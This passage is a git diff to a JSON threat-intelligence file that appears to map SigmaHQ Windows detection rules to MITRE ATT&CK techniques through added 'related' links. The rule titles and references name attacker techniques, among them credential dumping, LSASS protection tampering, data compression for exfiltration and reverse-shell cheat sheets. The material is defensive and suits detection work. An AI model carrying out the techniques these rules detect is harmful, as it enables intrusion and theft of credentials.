"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" ], "tags": [ @@ -36363,6 +46470,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", "value": "DIT Snapshot Viewer Use" }, @@ -36379,8 +46495,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" ], "tags": [ @@ -36388,6 +46504,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "value": "WMIC Hotfix Recon" }, @@ -36404,8 +46529,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/ps/foreach-object.htmll", "https://ss64.com/nt/for.html", + "https://ss64.com/ps/foreach-object.htmll", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_network_scan_loop.yml" ], @@ -36416,6 +46541,15 @@ "attack.t1018" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "value": "Suspicious Scan Loop Network" }, @@ -36462,6 +46596,15 @@ "attack.t1489" ] }, + "related": [ + { + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "value": "Suspicious Stop Windows Service" }, @@ -36487,6 +46630,22 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "value": "Encoded FromBase64String" }, @@ -36512,6 +46671,15 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", "value": "Launch TruffleSnout Executable" }, @@ -36537,6 +46705,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "value": "Suspicious Get ComputerSystem Information with WMIC" }, @@ -36553,9 +46730,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://twitter.com/oulusoyum/status/1191329746069655553", "https://twitter.com/mattifestation/status/1196390321783025666", - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml" ], "tags": [ @@ -36565,6 +46742,22 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", "value": "Time Travel Debugging Utility Usage" }, @@ -36581,9 +46774,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/threat-detection-report/threats/qbot/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" ], "tags": [ @@ -36591,6 +46784,15 @@ "attack.t1005" ] }, + "related": [ + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "value": "Esentutl Steals Browser Information" }, @@ -36607,9 +46809,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" ], "tags": [ @@ -36620,6 +46822,29 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", "value": "Abusing Findstr for Defense Evasion" }, @@ -36637,9 +46862,9 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html", - "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "https://www.softpedia.com/get/Antivirus/Removal-Tools/ithurricane-PowerTool.shtml", + "https://twitter.com/gbti_sa/status/1249653895900602375?lang=en", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powertool_execution.yml" ], "tags": [ @@ -36674,6 +46899,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5bb68627-3198-40ca-b458-49f973db8752", "value": "Rundll32 Without Parameters" }, @@ -36702,6 +46943,22 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", "value": "WSL Execution" }, @@ -36770,6 +47027,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" }, @@ -36794,6 +47060,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", "value": "Download Files Using Notepad++ GUP Utility" }, @@ -36818,6 +47093,15 @@ "attack.t1027.009" ] }, + "related": [ + { + "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "value": "Powershell Token Obfuscation - Process Creation" }, @@ -36892,6 +47176,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "value": "Devtoolslauncher.exe Executes Specified Binary" }, @@ -36917,6 +47210,15 @@ "attack.t1003.003" ] }, + "related": [ + { + "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", "value": "Judgement Panda Credential Access Activity" }, @@ -36933,8 +47235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini", "https://lolbas-project.github.io/lolbas/Binaries/Regini/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml" ], @@ -36967,6 +47269,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", "value": "7Zip Compressing Dump Files" }, @@ -37008,8 +47319,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" ], "tags": [ @@ -37022,6 +47333,29 @@ "cve.2020.10189" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", "value": "Exploited CVE-2020-10189 Zoho ManageEngine" }, @@ -37038,8 +47372,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml" ], "tags": [ @@ -37072,6 +47406,15 @@ "cve.2021.35211" ] }, + "related": [ + { + "dest-uuid": "3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", "value": "Suspicious Serv-U Process Pattern" }, @@ -37097,6 +47440,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "value": "Wsudo Suspicious Execution" }, @@ -37113,8 +47465,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_proxy_exec_wmic.yml" ], "tags": [ @@ -37125,6 +47477,29 @@ "attack.defense_evasion" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "value": "Office Processes Proxy Execution Through WMIC" }, @@ -37150,6 +47525,15 @@ "attack.t1218.010" ] }, + "related": [ + { + "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", "value": "Suspicious Regsvr32 HTTP IP Pattern" }, @@ -37175,6 +47559,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d", "value": "Curl Usage on Windows" }, @@ -37199,6 +47592,15 @@ "attack.t1218.011" ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba", "value": "Detection of PowerShell Execution via DLL" }, @@ -37223,11 +47625,20 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0bbc6369-43e3-453d-9944-cae58821c173", "value": "Execution via WorkFolders.exe" }, { - "description": "Detects suspicious sub processes spawned by PowerShell", + "description": "Detects suspicious child processes spawned by PowerShell", "meta": { "author": "Florian Roth, Tim Shelton", "creation_date": "2022/04/26", @@ -37245,7 +47656,7 @@ "tags": "No established tags" }, "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "value": "Suspicious PowerShell Sub Processes" + "value": "Suspicious PowerShell Child Processes" }, { "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", @@ -37284,8 +47695,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://twitter.com/ShadowChasing1/status/1552595370961944576", + "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml" ], "tags": [ @@ -37293,6 +47704,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "value": "Suspicious Net Use Command Combo" }, @@ -37309,8 +47729,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" ], "tags": [ @@ -37321,6 +47741,22 @@ "attack.t1566.001" ] }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", "value": "Exploit for CVE-2017-8759" }, @@ -37345,6 +47781,15 @@ "attack.t1216" ] }, + "related": [ + { + "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", "value": "Suspicious CustomShellHost Execution" }, @@ -37369,6 +47814,15 @@ "attack.t1562.010" ] }, + "related": [ + { + "dest-uuid": "824add00-99a1-4b15-9a2d-6c5683b7b497", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "value": "Registry Disabling LSASS PPL" }, @@ -37416,6 +47870,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", "value": "Potential Persistence Execution Via Microsoft Compatibility Appraiser" }, @@ -37444,6 +47907,22 @@ "attack.t1620" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4933e63b-9b77-476e-ab29-761bc5b7d15a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "value": "Base64 Encoded Reflective Assembly Load" }, @@ -37460,9 +47939,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" ], "tags": [ @@ -37470,6 +47949,15 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", "value": "Suspicious Schtasks Schedule Types" }, @@ -37486,8 +47974,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" ], "tags": [ @@ -37523,6 +48011,29 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", "value": "Application Whitelisting Bypass via Bginfo" }, @@ -37540,8 +48051,8 @@ "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" ], "tags": [ @@ -37549,6 +48060,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", "value": "WMIC Unquoted Services Path Lookup" }, @@ -37565,8 +48085,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://twitter.com/orange_8361/status/1518970259868626944", + "https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr.yml" ], "tags": [ @@ -37590,12 +48110,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://www.joeware.net/freetools/tools/adfind/", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://thedfirreport.com/2020/05/08/adfind-recon/", + "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", + "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", + "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", + "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_adfind.yml" ], "tags": [ @@ -37606,6 +48126,22 @@ "attack.t1069.002" ] }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", "value": "Renamed AdFind Detection" }, @@ -37631,6 +48167,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "value": "Renamed MegaSync" }, @@ -37687,6 +48232,29 @@ "attack.t1218.005" ] }, + "related": [ + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", "value": "Baby Shark Activity" }, @@ -37736,6 +48304,15 @@ "attack.t1485" ] }, + "related": [ + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "1a70042a-6622-4a2b-8958-267625349abf", "value": "Run from a Zip File" }, @@ -37761,6 +48338,15 @@ "attack.t1546.011" ] }, + "related": [ + { + "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "517490a7-115a-48c6-8862-1a481504d5a8", "value": "Possible Shim Database Persistence via sdbinst.exe" }, @@ -37777,9 +48363,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.php.net/manual/en/features.commandline.php", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.revshells.com/", - "https://www.php.net/manual/en/features.commandline.php", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml" ], "tags": [ @@ -37787,6 +48373,15 @@ "attack.t1059" ] }, + "related": [ + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d81871ef-5738-47ab-9797-7a9c90cd4bfb", "value": "Php Inline Command Execution" }, @@ -37837,6 +48432,15 @@ "attack.t1560.001" ] }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", "value": "Rar Usage with Password and Compression Level" }, @@ -37862,6 +48466,15 @@ "attack.execution" ] }, + "related": [ + { + "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "50919691-7302-437f-8e10-1fe088afa145", "value": "Regsvr32 Command Line Without DLL" }, @@ -37887,6 +48500,15 @@ "attack.t1047" ] }, + "related": [ + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", "value": "Blue Mockingbird" }, @@ -37906,8 +48528,8 @@ "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", - "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", 